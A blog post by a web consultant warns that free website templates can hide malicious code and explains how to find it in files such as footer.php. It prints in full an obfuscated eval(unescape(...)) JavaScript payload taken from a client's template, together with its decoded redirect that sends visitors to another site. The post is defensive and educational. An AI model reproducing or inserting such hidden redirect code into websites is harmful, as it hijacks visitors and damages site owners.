Nov

1

Beware of Free Templates

by chicagohh

Over the last 5 years content management software (WordPress, Joomla etc…) have become, maybe, the most popular platforms used to launch  new websites. Before these very well developed CMS solutions all websites were pretty much written from scratch. Along with the CMS a very strong after market for building templates has grown. These templates allow anyone to build and launch a very nice looking website cheap and fast.  You can even find websites that are giving away free templates. There are others that give away popular templates that you normally have to pay to use.  As usual, the old adage is true when it comes to getting something for free.

Hidden Links to P*rn, Casio’s or Worse

I first noticed a hack specifically designed for WordPress templates (it works on any PHP template) back in 2008. I was hired to increase leads for a Chicago dentist. They had a wonderful looking website with tons of great content, but they couldn’t rank in the search engines – even for their own name.  They had hired a local web development company (that happened to specialize with dentists) to build their website. On paper it looked like they had made a good decision, but there was something terribly wrong.

Very quickly, using a few tools that I developed, I was able to uncover hidden links on every page of this dentist’s website.  Each page of her site had three links – one was pointing to a German p*rn website, a second link was pointing to an online Casio company and the third link was pointing… well, I won’t say here (you can contact me if you’re really curious).  Needless to say Google, Yahoo and Bing thought (rightly so) that this dentist was promoting these other websites. Not. Good.

The code that was used to create the links was sort of hidden. You couldn’t see the links by just looking at the website in your browser or even by viewing the source code.  The software that built the links was smart enough to only show them to the major search engines. So, the dentist never knew they existed and even the developer who built her site didn’t know they existed.

Recently, I had another client reach out to me with the same problem so I thought I would share how to find this hacked code.

How Do You Find It?

You need to be able to look at the source code of your website. If it’s a WordPress site this code will almost always be found in the footer.php file or something similar. The code is also encoded so that it looks like a neat, innocent printout of code that may look like it’s needed. I think this is why so many developers ignore it.

Here is a shapshot of what the most recent code I found looked like:
eval(unescape(‘%76%61%72%20%6e%78%36%61%3d%27%70%2e%6c%6f%63%27%3b%20%76%61%72%20%74%31%71%65%3d%27%6f%6e%29%20%7b%27%3b%20%76%61%72%20%77%68%30%73%63%75%3d%27%62%35%64%66%22%3b%20%27%3b%20%76%61%72%20%78%68%66%34%65%75%3d%27%77%2e%74%61%6d%62%61%6c%61%2e%69%27%3b%20%76%61%72%20%75%65%76%32%3d%27%77%27%3b%20%76%61%72%20%69%76%78%61%38%3d%27%7d%20%27%3b%20%76%61%72%20%79%36%6b%6b%3d%27%7d%20%27%3b%20%76%61%72%20%65%6b%77%71%35%3d%27%2e%6c%6f%27%3b%20%76%61%72%20%6e%64%6f%69%30%61%3d%27%67%2f%69%6e%64%65%78%2e%70%68%70%3f%6d%6e%3d%38%37%33%38%39%33%26%73%69%74%65%27%3b%20%76%61%72%20%70%7a%6a%38%3d%27%6f%6f%64%77%6f%72%6b%27%3b%20%76%61%72%20%66%62%30%63%61%3d%27%61%72%20%76%70%6b%72%66%30%3d%27%3d%20%73%65%6c%66%2e%6c%6f%63%61%74%69%27%3b%20%76%61%3b%20%65%76%61%6c%28%62%39%6f%70%70%66%2b%6e%78%36%61%2b%75%7a%33%74%6c%61%2b%66%62%30%63%61%2b%76%70%6b%72%66%30%2b%74%31%71%65%2b%73%61%33%75%71%73%2b%72%32%63%62%2b%77%66%75%66%33%2b%6a%72%34%6b%2b%79%36%6b%6b%2b%6c%71%6d%73%37%2b%62%76%69%64%75%35%2b%65%6b%77%71%35%2b%63%36%74%30%74%6c%2b%66%6f%39%6b%6d%2b%78%68%66%34%65%75%2b%6b%35%76%70%2b%75%65%76%32%2b%70%7a%6a%38%2b%76%65%74%32%2b%6e%64%6f%69%30%61%2b%7a%6c%78%38%6c%2b%77%68%30%73%63%75%2b%69%76%78%61%38%29%3b’));

What a mess, huh? It’s no wonder most people ignore it.  It took me several steps to decode it. At first I found what looked like meaningless stuff:

var nx6a=’p.loc’; var t1qe=’on) {‘; var wh0scu=’b5df”; ‘; var xhf4eu=’w.tambala.i’; var uev2=’w'; var ivxa8=’} ‘; var y6kk=’}

But, if you look closely you can see that most of those chunks of text begin with VAR. That is how to define a variable in JavaScript. Lastly, there was this:

eval(b9oppf+nx6a+uz3tla+fb0ca…

This was instructions to assemble all those variables and then run, as JavaScript, whatever it spelled out.

if (top.location != self.location) { top.location = self.location.href; } else { window.location = “TheBadWebSite”; }

In this case, the code was actually sending some -  but not all -  visitors to a *different* website. Yikes. It wasn’t until the business owner (another dentist) started hearing from many patients that their website was broken that they contacted me.

How Did It Happen?

It happened because the web developer that was hired used a free template as a starting point for their website. Like so many developers nowadays, they are not really a programmer at all.  In this case the developer was a talented designer – meaning they created very nice looking pages, but they didn’t know how the code really worked. Oops.

They also didn’t know how to get visitors to do anything on the site like call the dentist, email or use a form… but that is another story.

Leave a Reply